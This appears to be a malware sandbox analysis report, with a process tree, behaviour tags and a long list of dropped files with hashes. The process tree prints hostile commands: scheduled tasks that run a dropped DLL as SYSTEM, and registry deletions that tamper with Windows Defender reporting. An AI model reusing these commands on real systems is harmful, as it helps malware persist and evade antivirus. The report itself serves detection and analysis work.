C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dfmYRzBlaRqgkDuyWQh2" /F /xml "C:\Program Files (x86)\xWNndLwYWxPLC\wjCmfhm.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2360
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ovLFxavpEMJUeWygf" /SC once /ST 02:40:19 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\SafQccDpCMVtGOrp\DHAhFDgW\mvUTbsk.dll\",#1 /spsite_idtwf 385118" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2288
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ovLFxavpEMJUeWygf"3⤵PID:1992
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1732
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:2732
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:2980
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:2040
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "imJjYhUpaoZYZHtqO"3⤵PID:944
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\SafQccDpCMVtGOrp\DHAhFDgW\mvUTbsk.dll",#1 /spsite_idtwf 3851182⤵PID:2464
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\SafQccDpCMVtGOrp\DHAhFDgW\mvUTbsk.dll",#1 /spsite_idtwf 3851183⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2572 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ovLFxavpEMJUeWygf"4⤵PID:1360
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1416
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2828
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2336
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD54f628fa262d8c34867bbd74ee4bf44f9
SHA10a3a3bff549690f1cd9b67a105b997db66f7e498
SHA2567d6d86253ef1013d6705cf26669bdd7e44008cc109609efa3e927807152ecff3
SHA51242ec8e5d50f9a1bdb1ed73d1d1d2d2435c3503b1ac8cb1e06767df76881eb3b21d8a5f9d3eb85872d4b72d3fcbc73368bf0cc9b159bb44f409215d49aa3e9eff
-
Filesize
2KB
MD5a0dc19d91d388398a4963327bf346009
SHA19e76804067d16509f0bcf8e4177733263a76e496
SHA256b960d601baf8a902e77f5a4e3eeeb2c039ef91221e5aa6187aefaa74bc3cc5db
SHA51210d97e5488cb4109c0b3e389c54af0fa7c6ae121ad8c326c4f46eb50627f2d4eff69f2a1248891c0d082d8b30589046ef79ca3be96df4f34f05de5f50a51f944
-
Filesize
2KB
MD5ee523e67351523c90b91f08f5f3403cf
SHA14da67bb5b604d4031b012adaa8b3984e8dd2c584
SHA25697c240e4c39ee5638b7deed0b9e9970cb327f530317073bcf9cb6ab3855ec55e
SHA512d67d67c729abc733895a1e90d29bf1b19a8e973c86c137016c4ce153c38a2b216e8694fafc1ff34be075a50a6d4e903991d0edadec48047460afb595bbb4f725
-
Filesize
2KB
MD546415ee214a49b9991aee35e4ca51d6e
SHA128042e052749add05c11224c025b85e7f12c9e41
SHA25634d8bb4128cb5acf36ea4f86cac3da8e1d970679479e3e19add8c49690b464ba
SHA512460341920eb64d917e9f2ffb43827a85edf661f9d0a4050b6910e65453694863f8c234d98d20d54c4421c9741fe0601fce4a0a295832541f1987f511cd926555
-
Filesize
2.0MB
MD5899063dce0d37329c0be2294af1d16ce
SHA1b26b42de333e3b5a0affd5730f31e447f4666a0e
SHA25649acdaf40ac59bc186b2cb6e3703c4bf8f3c52b1e83d28e6078c6b71fc65a949
SHA512b5d4bd751f314c91e32e870d5c0c85341e8a5adc105877867c8590f073232d6a649d49cd8681f06fa302ab254d1a4c7eaf8f5b655fcc925f886247a221cfa0f3
-
Filesize
2KB
MD5df8b85f83fea830d24bdcead11b9f651
SHA131bfb2adba24362e4383e1c0e297104ca5ab9271
SHA2566936a668df39748ca4300d920076011d11d62e599f157de6e4b51d135e7bd356
SHA51212ae909eb0175b83c1b711eba75f0c48f4d78e0225515ae0a7817f742c99170d5954b9ad6b8c876a131ee645e6eddf848f568e1d4ad553e97dcb99cb29af37eb
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
8KB
MD557a73c07c431646705581f2992e5b5c0
SHA1abc49151335becb2ea47764e1cf1e4eccdec284c
SHA256c90efcb09bc9530bcc6b2f0d59712e106d8a8111b0e30061c806d7d007e3c8bf
SHA5122225fd6de922c1dde2991291981c8f8d5e5f61f63ab34c3973ac2b78707037c2079e44b19b0380ca89a25015bc3e27740c6067a13f226e5f9ffb77ad2d49c136
-
Filesize
3.1MB
MD5570fcd2f7a41d118fdfef71b53d698d2
SHA1bbbab8deeed194c272624cff7815f56c82e195d3
SHA2567485fa74d35fee9e5121f6b2d8f85c0e94a23d47e53493d01c6f949b436eafdc
SHA512d3e78fd7977338eb4fb1cbc413f5b8fb35e86070fc202e28bb3e57611b1e7dfe748c67d70e78d8abfa3836639e23add7ec2c4b75509ac177ae9764749cd849cc
-
Filesize
2.9MB
MD56d1b4b76e0e2ea873ced829867c56d30
SHA1b20471b3372da4deb48a6f011a8ef871f5e917fd
SHA2567d08cd98a88619c0356afbe3536d399ceef9f6cd32c77d85b081e38108e8bf7d
SHA512fe1ae1043b71a19f1579c820ca778ef465b9381018a62302c01ae5bdac5f7730cb36c32aa6431d01b2f1d440467305bf677903c8902cd8dde5133e96a9b39092
-
Filesize
768KB
MD5d48187bf877a76d31404c1ed91ec550b
SHA1db2ed8c01f993d209a13bcba93e60584c4f1f3b0
SHA2561aec1e54e9d8b84630c9830c9159f94f1f3c5b992d4c776f670cf245e2fbd913
SHA512a17849df1722c390a60680f7f294eb6cf374dd4e715a8a720807c9374f4adbe2cb0c09cdb1a11d26f8cdccfbbf9b8d66ef77db7b21f1d6cfb6ebd31e7547a260
-
Filesize
704KB
MD5befbb9071e91468688c15cfc6c77dac2
SHA15ecd586d922a457792e102d5a26fbd322b2ab68a
SHA2560d10c410d8208f0b3e3faa8eb4f16a7128cb25e58e0a8e908b3b69870aa9e6a2
SHA5129034e78ae2589fde41ae4c4885c713c94984961eb84acd04c8d557c53ec146d57164797b398e14cc67221a6b9733925d2ea37884d71605956a5651e75353d504
-
Filesize
6.8MB
MD5ca25394a90c074c74fd7b59f561372e4
SHA101c1f8caac4ebc4c09d86e6b32eafedc84a25059
SHA25631e24fab1af31ac5e19a54c0662e6ea26b3aad91c043d3c489a16ea02a50cc7a
SHA51298e866f51e371caddf58d75b0819a7b8beb99ffdca0aac9e8bec3b862dcfef4f864d9430845d219c7025f7879563451c5ad6375c2fe92e2819948fb34497d584
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5893cfc86b40e55bd070e1ce910f8b20e
SHA113f81d27e0a70afcd12a1017fd44100b69dd2811
SHA256c0f70d94a55d579fb286f962533519306371b2b6a505bbb175db58da8f657aae
SHA512831ea3bf13f0b8e320912e8df4e2b49d3b32a9fa684ea7b10a71492073e453abf11e191d8f700918f976a2432de2d247ccfe2bf4e6083d2b2e34a4f1f2ae1042
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD556db66bbf688d0678cb7d84a708195ab
SHA190dc8e44403bbb61535b25654d48050062715fa0
SHA256b4b54ea47028abb737e5fcb8811b9ce83897f6045ab387d22ab1ff19fc11a86b
SHA512a5dd5dfa6a52c00798ab11e228b70a7021f99d4acc4ef5258675811b762f3e43effb30070cf685b2c07c567d458cad2f805da68cb6c2085c3ad4867cac57ccfa
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d0ca851aea6966b640b88232b4459e14
SHA1399082e1a6ed26798f04f09f0b17605d429dd3a4
SHA25673ad949304f39082066b5922e123d94c9763e0a09ad27b1139de2612facee29a
SHA512af7d5346a95450e48898fcd9e951dcbf9a212fe616494b8823c482d76446abe0bae8ad404f3bd5eaa11c5d2ec76193c2f5b26b5309c0df99c7025a87ceedd14f
-
Filesize
6KB
MD5b69b25ba7debcef426856fc25c017c0f
SHA1e0cdcdbc7fb1089f30b10b8727efe17d2c37a29c
SHA25688f0a39fac3122f326adf9d188e259d293fda1766df0f23ef8c01aa106fa10af
SHA512f58add56295761501071daf0852c043d61c30e70eed64c831ebf77b9a505f577b97a150a7664f32651fa2a5be8857d4d2a865c1791b8b148d4f0715dcb06168d
-
Filesize
6.4MB
MD59385c5278335249c3c30af89e6c496d6
SHA147523350c3547a87b08c758c4eac0858fff5d922
SHA256b36b60f7cf9d4bef1249748ead5cc028687d30e732ef9c9e03910c243dd4c29d
SHA512b2f23d9913cca7d70bc18c7323cd7b5a691822ec1fded32040732ff65bfbccb666bee5e433ffb6e9661871b0a6f7d3a07fa79d110a80f3a7c495960b100749f5
-
Filesize
3.4MB
MD54fc58307871d8281321d0fa4f0338521
SHA1a8b7416a663c648d3cec4bf5a298bdc5cee248bf
SHA25658c336bb1553fba4fc95b7e99bf2434ffbf68f6c8128065572776c74b85968c1
SHA5129c3ed160fb924cbf1348146654fdf006cad52d8625e04f34adf8541be31a37c688a1321224ea14a245da30a5abd47add90d82a02f029841b4e0a5ffe2cbc1d80
-
Filesize
4.4MB
MD5e1285f2be610cd0bc35479bb2546b65d
SHA1ebd4196a51f125264d172518705365dd32094cfb
SHA256974c8bef3e9e1ca9dabfd207734dcb462c9bbecbbc2ec58b3c064850839edfdd
SHA512b350eaaf8169c7f732d571f90aabecc2daf22a2621f2924535087f3f56f98c42501ff9ff5de8d06246fe7a6541a3802a1b2efe9c0d7015b6e0d418fcc644d7f7
-
Filesize
9KB
MD54663f6fa487db50bb8d9a8386c7be632
SHA1f2f4bcdde50d3ba8120a207b7f91e2a4bc5e29bf
SHA256a14a49259a61f521fc782f3c67a9f8865888e1c80f9d7e2d2c78836370380e6b
SHA5128583e3add7da4ba757ceea21934aa63b930c5594e054f636189af0f443fc17546055ca0ec6256e13ef185ddeaaaa9b95ce1935374083197009c82ada836cdad5
-
Filesize
5KB
MD5d693a130b9e3d1683067ceee7028809e
SHA115a2c74b766e4047c71407d400899bf17b5d556f
SHA25674002cd495f27c40dcd16c0611f0232b2d54a8daef93960f844c475884546c9f
SHA512b26508a36ed0c95e38f98f7594b9024369b6453ff14e7f47a5db5772d05ca5edaf7faed06892e7cdc60c01972dde456e765e2f821e86a0dd15ef69fa59660925
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
1.2MB
MD5d895637aa1750c98baf9107c8a5a3d2d
SHA10e84dea02f26322d43979c92ba512b4dafdbc3eb
SHA2562e50ea0813275e32828f8a758180ca7954916b01bee977724ebb4ba4d819159e
SHA51234a3f76026d52ba2f23c66e32f6aa82daf21af8ad4a31f46a07f4438bd8244012d0df1a4acee839e384a4b996487543e28da14113b5c8726feb032a97891778e
-
Filesize
1.8MB
MD5b94460ef80143954faffa6a483b40899
SHA155c210ce9c8113467811a109f887d88444364b81
SHA2568fdf339c64c198f396b51ecdc60c98aeacdee38ac65ffe1adbcab328ae97b45d
SHA5129471e58f2c60d3b53f8527aa2be625e9d557290e7e2044140118b8f748decfe66dad18a299b81553267fd2cd512d51ff80bc5e6809d05d20495e092ac0a73314
-
Filesize
4.6MB
MD51e90ce39f9f11af241d9fe7d80831523
SHA1412d9b910cdfda11d0df2f2c648e12d6016fef43
SHA2568c07ea3069fe57486569642fa17195e6b7f7714d386483fd5ba02f704dbcf914
SHA5121b62db0668fa1aa8a29f5ade1435cf90486fafa03c08a85611b1dfac66708166b560df8801ce67523fb315f69ebfcc350385ca3d635ddb4328a3d305d3ac101e
-
Filesize
2.1MB
MD57553efece261eeb1ef942b1e1005fba6
SHA106cc5d9d163cc951d28ba5849efeb433ad64f6b9
SHA2561efb5aec6393c980b1e256df72073d2db602a3a54429291a594f6d47bd5a005d
SHA5126a0355195b11e3afb56a5ba48e330938558f1f6ab09b03bc66ef22986bea01d55dedb66687fda86fc26b27318c3b2cada200804c7166a88a5674f4f02f4f9dab
-
Filesize
192KB
MD5d8daedecb82be47385b01e96bab71e59
SHA1e75d2365c858248c73ad8f5d312f53f4f8694efe
SHA2564a069dbfd80122bcae74c696ab0341549bd1505533c657ce78c66aa0f4449151
SHA512e88853acfe1d231f97655a1d4515652f5d64b7cb41f216f137aca14d51612ebc80acce05763037d3aae8d10ccb1048a8bfbfbec66da2524a3bface6f61ca1616
-
Filesize
832KB
MD5f6133db2f822add4a08eff7a69521aa2
SHA152245116799007f0d85200293200d7fbf5b333fa
SHA25687c7658b67a36d5d5f176239e28d2401f4f299d6233ccb4a2b5f725313c7ceb5
SHA5120f862bfd12be4512743c468df16809065e25207a49dc7c8fa94dfaf25325e6ec6b59e240aff78c2f792cf4e4a0d7f965c2a389ccaa32cceb9fccbe96be90b6ed
-
Filesize
5.1MB
MD5e500f2d97d34f2ffc4e0d4477b7dbc1b
SHA1d6b56c2a79c64b4740d89a8c6af4dfe03b3fab44
SHA256f96a9357415fe30bb4ccf2aa93176b9ccaa57f4218ceb48a10bf9d51ec394f68
SHA512a2b384993467a8655ea4a8c8099602ccf2f939fd9862422a4b5a92f60260dc81f4e2b26f2af4d1482b9e6ee40903e6a4345555b144ebaf652ecb24d754db5d9a
-
Filesize
3.6MB
MD548d31a5d8a69e841970bc76c38fffd1c
SHA1ac5d946a9b11e204291d80bfdbdfd38627039c29
SHA2567925fd29b848aa0790d01668ba42eae634e35894902d33c8ab8db71bb264b71f
SHA51299b198470427bf8b78e4be37feeffbec80a1adc9ce15cd6d17ad0cce3f1fcb76e8276a6c6eb3145752b01323b992c08158b5e0f769569933c861f0ef12cdc2fb
-
Filesize
4.3MB
MD5fce59ab52030a8cc8134be9d6ec89cda
SHA1d68ff3357361264dcc27a3fef3a404e1e426f4f1
SHA25623c73e87d539c8034e80c7896da645743b6c0c066004ee2c992a4de73febdcf1
SHA512218330f490fe7eed2d56dae54ba1f5d4841070fb6ba5a4c8b27a855de3ebbda23418875d2b5a9f6216f5b98847bcdbf4ce622069a5122fb32776f4ea0ea19f3b
-
Filesize
3.3MB
MD5e3fd8d39154e80e4d135f67153a0cc89
SHA1ccc6ca652d505484fc2e1af6e9293166ed39b9a7
SHA2566078ef585d9517ce87afa82b28aefa177edc968ae9798262957f226fce080be9
SHA5126b7f1c9cf8263c543effae1fa7c84fdd1c6526ae42259ad063b7bd98fb6908056518302cc711ae4869b79397dbfb9ea4cc5528cdd797ed0518553f94d63e0897